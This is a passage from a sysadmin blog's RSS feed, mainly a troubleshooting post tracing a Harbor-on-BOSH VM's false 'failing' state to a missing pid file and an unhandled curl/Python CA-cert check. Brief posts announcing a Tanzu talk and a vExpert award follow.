https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=2048%2C549&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>Monit is using a specific script, to start and stop Harbor, /var/vcap/jobs/docker/bin/ctl<br />If it meets the failure condition, it will use the same script to try and restart it.</p>
<p>The results of the ctl script, are being saved to ctl.stdout.log<br />In that file, we can see that the Harbor startup, is timing out, well at least according to the script.</p>
<pre>[Mon Feb 15 15:30:43 UTC 2021] Harbor service is not ready. Waiting for 5 seconds then check again.<br />[Mon Feb 15 15:30:48 UTC 2021] Harbor service is not ready. Waiting for 5 seconds then check again.<br />[Mon Feb 15 15:30:53 UTC 2021] Error: Harbor Service failed to start in 180 seconds.<br /><br /></pre>
<p>Now the odd thing here was, that when I checked 'Docker ps', all the containers where actually running. And in fact, I could even reach the Harbor webUI without any problem.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1650" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?resize=640%2C469&#038;ssl=1" alt="" width="640" height="469" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?w=1142&amp;ssl=1 1142w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?resize=300%2C220&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?resize=1024%2C751&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?resize=768%2C564&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a><br />So Harbor was actually working. Why then was the ctl script concluding that the startup had failed?  What was it tripping over?</p>
<p>Harbor is actually coming up normally every time. Its monit that is confused.</p>
<p>Monit is set to check the existence of the file ‘/var/vcap/sys/run/harbor/harbor.pid’</p>
<p>However, for whatever reason, when I checked this file did not exist, so monit keeps thinking it failed to start, and tries to restart the whole container set.</p>
<p>This actually keeps failing, as all containers are already starting, the command '/var/vcap/jobs/loggr-system-metrics-agent/bin/ctl start' doesn’t seem to actually do anything in this case. <br /> So monit ends up in a loop, and bosh (monit) reports the VM as ‘failing’ state. (this is why the deployment ‘fails’, but it didn’t, actually).</p>
<p>So what is in the location file ‘/var/vcap/sys/run/harbor/’ ?     </p>
<p>harbor.tmp.pid, not harbor.pid, as monit is expecting.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1643" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?resize=640%2C82&#038;ssl=1" alt="" width="640" height="82" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?w=1070&amp;ssl=1 1070w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?resize=300%2C38&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?resize=1024%2C131&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?resize=768%2C98&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>Now there was another thing that caught my attention; the cron.log file, was filling up with these mysterious python errors:</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1642" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?resize=640%2C140&#038;ssl=1" alt="" width="640" height="140" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?w=1444&amp;ssl=1 1444w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?resize=300%2C65&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?resize=1024%2C223&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?resize=768%2C168&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<pre>curl -s --cacert /var/vcap/jobs/harbor/config/ca.crt https://&lt;harbor FQDN&gt;/api/v2.0/systeminfo<br />Traceback (most recent call last):<br />File "&lt;string&gt;", line 1, in &lt;module&gt;<br />File "/var/vcap/packages/python/python2.7/lib/python2.7/json/__init__.py", line 291, in load<br />**kw)<br />File "/var/vcap/packages/python/python2.7/lib/python2.7/json/__init__.py", line 339, in loads<br />return _default_decoder.decode(s)<br />File "/var/vcap/packages/python/python2.7/lib/python2.7/json/decoder.py", line 364, in decode<br />obj, end = self.raw_decode(s, idx=_w(s, 0).end())<br />File "/var/vcap/packages/python/python2.7/lib/python2.7/json/decoder.py", line 382, in raw_decode<br />raise ValueError("No JSON object could be decoded")<br />ValueError: No JSON object could be decoded</pre>
<p>This log output in cron.log, was a bit confusing. We can see it doing a curl command using the CA cert. But then it spits out a bunch of Python errors? Are the two related? Where is this coming from?</p>
<p>To understand what is going on, I needed to dig into the scripts.</p>
<p>As it turns out, the ctl script is actually using a different script altogether, to do a healthcheck on Harbor.</p>
<p>Ctl contains a function called ‘waitForHarbor’<br />This merely calls ‘/bin/status_check’  and waits for it to complete for 180 seconds.</p>
<p>And it is the results of this ‘/bin/status_check’  script that are being logged to cron.log.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1638" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?resize=640%2C284&#038;ssl=1" alt="" width="640" height="284" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?w=1029&amp;ssl=1 1029w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?resize=300%2C133&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?resize=1024%2C455&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?resize=768%2C341&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>&nbsp;</p>
<p>The ctl script is also responsible for maintaining the harbor.pid file. And this file is the health indicator that monit is actually triggering on.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1443.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1644" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1443.jpg?resize=595%2C397&#038;ssl=1" alt="" width="595" height="397" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1443.jpg?w=880&amp;ssl=1 880w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1443.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1443.jpg?resize=768%2C512&amp;ssl=1 768w" sizes="auto, (max-width: 595px) 100vw, 595px" /></a><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1645" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?resize=640%2C240&#038;ssl=1" alt="" width="640" height="240" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?w=1715&amp;ssl=1 1715w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?resize=300%2C112&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?resize=1024%2C384&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?resize=768%2C288&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?resize=1536%2C576&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>So that explains the behavior we are seeing. But why is it not passing 'waitForHarbor' aka, the ‘/bin/status_check’ script?</p>
<p>When we look at the ‘/bin/status_check’  script, it contains a bunch of healthchecks.</p>
<p>The source of the file, can actually be found here, if you want to see for yourself: <a href="https://github.com/vmware/harbor-boshrelease/blob/master/jobs/harbor/templates/bin/status_check.erb.sh">https://github.com/vmware/harbor-boshrelease/blob/master/jobs/harbor/templates/bin/status_check.erb.sh</a></p>
<p>This section immediately caught my eye:</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1637" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?resize=640%2C201&#038;ssl=1" alt="" width="640" height="201" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?w=1673&amp;ssl=1 1673w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?resize=300%2C94&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?resize=1024%2C321&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?resize=768%2C241&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?resize=1536%2C482&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>You can actually run the entire script yourself, and now it becomes obvious where those python errors where coming from:</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1647" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?resize=640%2C156&#038;ssl=1" alt="" width="640" height="156" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?w=1488&amp;ssl=1 1488w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?resize=300%2C73&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?resize=1024%2C250&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?resize=768%2C187&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>So what is it doing here?</p>
<p>curl --cacert verifies a CA cert, against the URL you specify. <br /><br />If it fails, it will produce the text below.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1646" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=640%2C102&#038;ssl=1" alt="" width="640" height="102" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?w=2384&amp;ssl=1 2384w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=300%2C48&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=1024%2C164&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=768%2C123&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=1536%2C245&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=2048%2C327&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>&nbsp;</p>
<p>However, in the check script, its set to curl -s for silent. In this case, it will fail silently.. curl wont produce any output at all.</p>
<pre>url=`${curl_command} ${protocol}://${harbor_url}/api/v2.0/systeminfo | python -c "import sys, json; print json.load(sys.stdin)['registry_url']"`</pre>
<p>But its still trying to pipe it to Python to do some kind of json breakdown of the output.</p>
<p>If curl doesn't fail, and the CA cert validates against the URL, the the python json filter will simply return the url again.</p>
<p>And this is where it fails. This section in the script contains no failure handling, in case the CA cert that you set in the config, doesn't actually validate against cert used by Harbot itself. And this was the case with me. I set the wrong CA cert (the root CA, instead of the intermediate, issuing CA).</p>
<p>So this was the root cause that Monit was failing the VM. It was not getting passed this part of the check_script. But its not really obvious from the logs, not even the cron.log, what is going wrong exactly! <br /><br />The irony here, is that Harbor actually was working fine. In fact, I have not been able to find anywhere or any reason that Harbor actually requires CA cert <em>at all</em>!  Its only the check-script that requires it, and that seems to be the only reason you have to give it the CA cert in the Opsman Tile config! <br /><br /><br /><br /></p>






]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1615</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434-1.jpg</image><post-id xmlns="com-wordpress:feed-additions:1">1615</post-id>	</item>
		<item>
		<title>Presentation &#8220;Tanzu for Dummies&#8221; &#8211; 29th Jan 2021</title>
		<link>https://thefluffyadmin.net/?p=1608</link>
					<comments>https://thefluffyadmin.net/?p=1608#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Thu, 21 Jan 2021 17:08:22 +0000</pubDate>
				<category><![CDATA[Career, Training and Personal Development]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[vexpert]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[ITQ]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[tkg]]></category>
		<category><![CDATA[tkgm]]></category>
		<category><![CDATA[tkgs]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1608</guid>

					<description><![CDATA[I will be doing a Tanzu Session on the 29th. This is my own effort to help explain the VMware Tanzu portfolio to our customers, and anyone else who might be interested! "Tanzu for Dummies" https://itq.eu/presentation-tanzu-for-dummies/ &#160; Modern software development is increasingly moving toward so-called cloud-native architectures. And to run these 'modern-apps', you will likely <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1608">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p class="p-rich_text_section">I will be doing a Tanzu Session on the 29th. This is my own effort to help explain the VMware Tanzu portfolio to our customers, and anyone else who might be interested!</p>
<p>"Tanzu for Dummies"<br />
<a class="c-link" href="https://itq.eu/presentation-tanzu-for-dummies/" target="_blank" rel="noopener noreferrer" data-stringify-link="https://itq.eu/presentation-tanzu-for-dummies/" data-sk="tooltip_parent">https://itq.eu/presentation-tanzu-for-dummies/</a></p>
<p>&nbsp;</p>
<blockquote>
<p class="c-mrkdwn__pre" data-stringify-type="pre">Modern software development is increasingly moving toward so-called cloud-native architectures. And to run these 'modern-apps', you will likely need containers, a little something called 'Kubernetes', and the infrastructure and integrated tools surrounding it, to bring your application to production.</p>
<p>To answer this need, VMware has introduced Tanzu. But what is VMware Tanzu? Is it a product? Is it a platform? Is it just Kubernetes, or is it more?</p>
<p>In this 'Tanzu for Dummies' session, I will take you on a trip through the VMware Tanzu portfolio and give you ITQ's take on it all!</p>
<p>We will pierce through the branding and acronyms, zoom in on the different Kubernetes flavors and editions that VMware currently has, and look at some of the products and technologies that surround them.I will talk about what these technologies do, where they came from, how VMware is positioning them and how they fit into the greater picture of the Tanzu portfolio. After this session you will leave with a better understanding of how VMware plans to answer the modern-app challenge with Tanzu, and how you can make your own modern applications thrive in the cloud-native world.</p></blockquote>
<p>&nbsp;</p>
<blockquote class="twitter-tweet" data-width="550" data-dnt="true">
<p lang="en" dir="ltr">What is VMware Tanzu? Is it just Kubernetes, or is it more?</p>
<p>In this ‘Tanzu for Dummies’ session, <a href="https://twitter.com/thefluffysysop?ref_src=twsrc%5Etfw">@thefluffysysop</a> will take you on a trip through the VMware Tanzu portfolio and give you ITQ’s take on it all!<a href="https://t.co/EG4InmHXPr">https://t.co/EG4InmHXPr</a><a href="https://twitter.com/hashtag/kubernetes?src=hash&amp;ref_src=twsrc%5Etfw">#kubernetes</a> <a href="https://twitter.com/hashtag/tanzu?src=hash&amp;ref_src=twsrc%5Etfw">#tanzu</a> <a href="https://twitter.com/hashtag/vmware?src=hash&amp;ref_src=twsrc%5Etfw">#vmware</a> <a href="https://twitter.com/hashtag/cloudnative?src=hash&amp;ref_src=twsrc%5Etfw">#cloudnative</a> <a href="https://t.co/73FfmbxsZk">pic.twitter.com/73FfmbxsZk</a></p>
<p>&mdash; ITQ (@ITQ) <a href="https://twitter.com/ITQ/status/1352214882943455233?ref_src=twsrc%5Etfw">January 21, 2021</a></p></blockquote>
<p><script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1608</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/01/EsQHvvWXUAEe5_S-1.jpg</image><post-id xmlns="com-wordpress:feed-additions:1">1608</post-id>	</item>
		<item>
		<title>VMware vExpert sub-program: Application Modernization 2020</title>
		<link>https://thefluffyadmin.net/?p=1602</link>
					<comments>https://thefluffyadmin.net/?p=1602#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Fri, 25 Sep 2020 16:22:09 +0000</pubDate>
				<category><![CDATA[Career, Training and Personal Development]]></category>
		<category><![CDATA[cloud-native]]></category>
		<category><![CDATA[vexpert]]></category>
		<category><![CDATA[vmware]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1602</guid>

					<description><![CDATA[Very honored to have been accepted into the inaugural VMware vExpert sub-program: Application Modernization 2020 Individuals who are awarded Application Modernization vExpert status are the cream of the crop when it comes to application modernization knowledge, including platforms that modern applications run on. They’re advocates of VMware Tanzu—a portfolio of VMware products and services for <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1602">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p><span class="break-words"><span dir="ltr">Very honored to have been accepted into the inaugural VMware vExpert sub-program: Application Modernization 2020<br />
</span></span></p>
<blockquote><p><em><span class="break-words"><span dir="ltr">Individuals who are awarded Application Modernization vExpert status are the cream of the crop when it comes to application modernization knowledge, including platforms that modern applications run on. They’re advocates of VMware Tanzu—a portfolio of VMware products and services for modernizing applications and infrastructure—as well as other application platforms running on VMware solutions. vExperts love “giving back” to the community by sharing their knowledge with their peers, whether through blogging or speaking at events like VMworld and VMUG.</span></span></em></p>
<p><img loading="lazy" decoding="async" id="ember2963" class="ivm-view-attr__img--centered feed-shared-image__image lazy-image ember-view" src="https://media-exp1.licdn.com/dms/image/C4D22AQHvPVbmBqoM1Q/feedshare-shrink_800-alternative/0?e=1603929600&amp;v=beta&amp;t=wbBS6cNXghRIDjs8Pfl2Xa1Xy9CNHQmQt0HOuLFTJjc" alt="No alternative text description for this image" width="600" height="395" /></p></blockquote>
<p>Read more:<br />
<a href="https://tanzu.vmware.com/content/blog/announcing-the-vmware-application-modernization-vexpert-program-2020">https://tanzu.vmware.com/content/blog/announcing-the-vmware-application-modernization-vexpert-program-2020</a></p>
<p>test</p>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1602</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2020/09/vexpert-am-2020-badge.png</image><post-id xmlns="com-wordpress:feed-additions:1">1602</post-id>	</item>
	</channel>
</rss>
